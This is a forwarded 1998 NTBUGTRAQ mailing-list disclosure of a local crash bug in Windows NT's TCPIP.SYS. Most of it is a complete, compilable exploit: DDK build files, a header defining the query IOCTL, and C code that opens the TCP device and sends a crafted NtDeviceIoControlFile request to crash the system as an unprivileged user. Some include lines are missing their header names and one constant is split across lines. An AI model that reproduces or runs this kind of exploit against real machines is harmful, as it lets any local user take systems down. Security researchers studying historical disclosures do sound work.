---------- Forwarded message ----------
From: Gigi Mori
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Date: Fri, 25 Sep 1998 18:19:50 +0200
Subject: Crashing NT with Native Calls
Hi,
Playing with TCPIP.SYS I've noticed that any user could crash the local system with a
IRQL_NOT_LESS_OR_EQUAL exception just calling the undocumented function NtDeviceIoControlFile with an
handle to TCPIP and the "right" parameters. NtDeviceIoControlFile is the native correspondent of
DeviceIoControl and is called by InetMib1.dll and WINSOCK Helper Dlls to retrieve TCPIP statistics thus
no special rights are needed to run the exploit. The bug resides in TCPIP.SYS InternalIoControl dispatch
routine where lacks a check on current IRQ level before processing the query information request.
This is the exploit (you should compile it with DDK):
--------------- begin SOURCES ---------------------------
TARGETNAME= tcpinfo
TARGETPATH= .
TARGETTYPE= PROGRAM
INCLUDES= .; ..\; \DDK\inc;\DDK\src\network\inc
SOURCES= tcpinfo.c
UMTYPE= console
UMBASE= 0x400000
UMLIBS= \DDK\lib\i386\checked\ntdll.lib
--------------- end SOURCES -----------------------------
--------------- begin makefile --------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
# file to this component. This file merely indirects to the real make file
# that is shared by all the driver components of the Windows NT DDK
#
!INCLUDE $(NTMAKEENV)\makefile.def
--------------- end makefile ----------------------------
--------------- begin native.h --------------------------
#ifndef gigi_native_h
#define gigi_native_h
typedef struct {
unsigned int bo;
unsigned int result;
HANDLE hevent;
} nt_overlapped;
#define IOCTL_TCP_QUERY_INFORMATION 0x120003
#endif /* gigi_native_h */
-------------- end native.h ----------------------------
-------------- begin tcpexploit.c ------------------------
#include
#include
#include
#include "native.h"
#define MAX_NAME_LEN 256
struct {
HANDLE h_tcp;
char buff[0x400];
} g;
unsigned int
open_tcp()
{
OBJECT_ATTRIBUTES object_attrs;
UNICODE_STRING device_tcp;
WCHAR device_tcp_buff[MAX_NAME_LEN];
IO_STATUS_BLOCK io_status_block;
NTSTATUS status;
device_tcp.Buffer = &device_tcp_buff;
RtlInitUnicodeString(&device_tcp, L"\\Device\\Tcp");
InitializeObjectAttributes(&object_attrs, &device_tcp,
OBJ_CASE_INSENSITIVE, NULL, NULL);
status = ZwCreateFile(&g.h_tcp, 0x20000000, &object_attrs,
&io_status_block, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_OPEN_IF,
0, NULL, 0);
if(status != STATUS_SUCCESS) {
printf("ZwCreateFile error %#x %#x\n", status, io_status_block);
return 0;
}
return 1;
}
void
close_tcp()
{
ZwClose(g.h_tcp);
}
unsigned int
tcp_query_information(void *in_buff, unsigned int in_buff_len,
void *out_buff, unsigned int out_buff_len)
{
NTSTATUS status;
nt_overlapped prova;
unsigned int i, *p;
status = NtCreateEvent(&prova.hevent, 0x1F003, 0, 1, NULL);
if(status != STATUS_SUCCESS) {
printf("NtCreateEvent error 0x#x\n", status);
return 0;
}
status = NtDeviceIoControlFile(g.h_tcp, prova.hevent, 0, 0,
&prova,
IOCTL_TCP_QUERY_INFORMA
TION,
in_buff,
in_buff_len,
out_buff,
out_buff_len);
ZwClose(prova.hevent);
printf("%#X\n", status);
return 1;
}
void __cdecl
main()
{
struct tcp_request_query_information_ex in_buff;
if(!open_tcp()) {
return;
}
in_buff.ID.toi_entity.tei_entity = CO_TL_ENTITY;
in_buff.ID.toi_entity.tei_instance = 0;
in_buff.ID.toi_class = INFO_CLASS_PROTOCOL;
in_buff.ID.toi_type = INFO_TYPE_CONNECTION;
in_buff.ID.toi_id = 0x5;
if(!tcp_query_information(&in_buff, 0x24, g.buff, sizeof(g.buff))) {
return;
}
close_tcp();
}
----------------- end tcpexploit.c ---------------------------------
Luigi Mori --
Symbolic (http://www.symbolic.it)